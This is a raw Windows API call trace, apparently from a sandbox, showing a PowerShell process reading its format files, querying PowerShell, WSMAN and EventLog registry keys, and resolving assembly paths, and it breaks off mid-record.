[0052.980] GetLastError () returned 0x0 [0052.980] SetErrorMode (uMode=0x1) returned 0x1 [0052.980] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2900224 | out: lpFileInformation=0x2900224*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0052.980] GetLastError () returned 0x0 [0052.980] SetErrorMode (uMode=0x1) returned 0x1 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.980] RegOpenKeyExW (in: 
hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.980] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.980] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.980] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.980] GetLastError () returned 0x0 [0052.981] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x3f12ad4b, Data2=0xcb1c, Data3=0x4bc1, Data4=([0]=0x90, [1]=0xfe, [2]=0x3d, [3]=0xa3, [4]=0xb6, [5]=0x7a, [6]=0x91, [7]=0x57))) returned 0x0 [0052.981] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6178cc6c, Data2=0xf830, Data3=0x46d6, Data4=([0]=0x89, [1]=0xd, [2]=0xcd, [3]=0x47, [4]=0xce, [5]=0xe8, [6]=0x86, [7]=0xd5))) returned 0x0 [0052.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, 
lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.981] GetLastError () returned 0x0 [0052.981] SetErrorMode (uMode=0x1) returned 0x1 [0052.981] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.981] GetLastError () returned 0x0 [0052.981] GetFileType (hFile=0x2f8) returned 0x1 [0052.982] SetErrorMode (uMode=0x1) returned 0x1 [0052.982] GetFileType (hFile=0x2f8) returned 0x1 [0052.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.983] GetLastError () returned 0x0 [0052.983] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.984] GetLastError () returned 0x0 [0052.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.984] GetLastError () returned 0x0 [0052.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.984] GetLastError () returned 0x0 [0052.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, 
lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0xe98, lpOverlapped=0x0) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x291576c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x291576c*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x2916134, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2916134*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] CloseHandle (hObject=0x2f8) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.985] GetLastError () returned 0x0 [0052.985] SetErrorMode (uMode=0x1) returned 0x1 [0052.985] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2937130 | out: lpFileInformation=0x2937130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0052.985] GetLastError () returned 0x0 [0052.985] SetErrorMode (uMode=0x1) returned 0x1 [0052.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, 
lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.985] GetLastError () returned 0x0 [0052.985] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.985] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.985] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.985] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.986] GetLastError () returned 0x0 [0052.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0052.986] GetLastError () returned 0x0 [0052.986] VirtualQuery (in: lpAddress=0x14d6c0, lpBuffer=0x14e6c0, dwLength=0x1c | out: lpBuffer=0x14e6c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.986] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6c958e00, Data2=0x2345, Data3=0x43bb, 
Data4=([0]=0x89, [1]=0xeb, [2]=0x5f, [3]=0x7e, [4]=0x6e, [5]=0xc4, [6]=0x61, [7]=0xd3))) returned 0x0 [0052.986] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x87b1b06f, Data2=0xccb5, Data3=0x448c, Data4=([0]=0xb9, [1]=0xe, [2]=0xdb, [3]=0xf5, [4]=0x13, [5]=0x3b, [6]=0xbd, [7]=0xc1))) returned 0x0 [0053.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0053.005] GetLastError () returned 0x57 [0053.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0053.005] GetLastError () returned 0x57 [0053.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0053.017] GetLastError () returned 0x57 [0053.017] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0053.017] GetLastError () returned 0x57 [0053.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.019] GetLastError () returned 0x57 [0053.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.019] GetLastError () returned 0x57 [0053.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0053.021] GetLastError () returned 0x57 [0053.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0053.021] 
GetLastError () returned 0x57 [0053.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0053.023] GetLastError () returned 0x57 [0053.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0053.023] GetLastError () returned 0x57 [0053.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0053.025] GetLastError () returned 0x57 [0053.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0053.025] GetLastError () returned 0x57 [0053.026] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.026] GetLastError () returned 0x57 [0053.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.027] GetLastError () returned 0x57 [0053.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.031] GetLastError () returned 0xcb [0053.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.032] GetLastError () returned 0xcb [0053.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.033] GetLastError () returned 0xcb [0053.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.033] GetLastError () returned 0xcb [0053.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.036] GetLastError () returned 0xcb [0053.038] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.038] GetLastError () returned 0xcb [0053.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 
[0053.039] GetLastError () returned 0xcb [0053.043] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea5c | out: phkResult=0x14ea5c*=0x2f8) returned 0x0 [0053.044] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14eaac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14eab0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14eaac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14eab0*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.044] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x3175c0, lpcchValueName=0x14ead4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14ead4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.044] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x3175c0, lpcchValueName=0x14ead4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14ead4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.045] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x3175c0, lpcchValueName=0x14ead4, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14ead4, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.045] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14eab4, lpData=0x0, lpcbData=0x14eab0*=0x0 | out: lpType=0x14eab4*=0x1, lpData=0x0, lpcbData=0x14eab0*=0x8) returned 0x0 [0053.045] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14eab4, lpData=0x3175c0, lpcbData=0x14eab0*=0x8 | out: lpType=0x14eab4*=0x1, lpData="2.0", 
lpcbData=0x14eab0*=0x8) returned 0x0 [0053.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ea18 | out: phkResult=0x14ea18*=0x2fc) returned 0x0 [0053.096] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea68, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea6c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea68*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea6c*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.096] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x3175c0, lpcchValueName=0x14ea90, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14ea90, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.096] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x3175c0, lpcchValueName=0x14ea90, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14ea90, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.096] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x3175c0, lpcchValueName=0x14ea90, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14ea90, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0053.096] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14ea70, lpData=0x0, lpcbData=0x14ea6c*=0x0 | out: lpType=0x14ea70*=0x1, lpData=0x0, lpcbData=0x14ea6c*=0x8) returned 0x0 [0053.096] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14ea70, lpData=0x3175c0, lpcbData=0x14ea6c*=0x8 | out: lpType=0x14ea70*=0x1, lpData="2.0", 
lpcbData=0x14ea6c*=0x8) returned 0x0 [0053.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.097] GetLastError () returned 0xcb [0053.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.099] GetLastError () returned 0xcb [0053.139] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e9d8 | out: phkResult=0x14e9d8*=0x300) returned 0x0 [0053.139] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ea40, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea3c, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ea40*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ea3c*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x3175c0, 
lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.140] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14ea5c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0053.141] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x3175c0, lpcchName=0x14ea5c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | 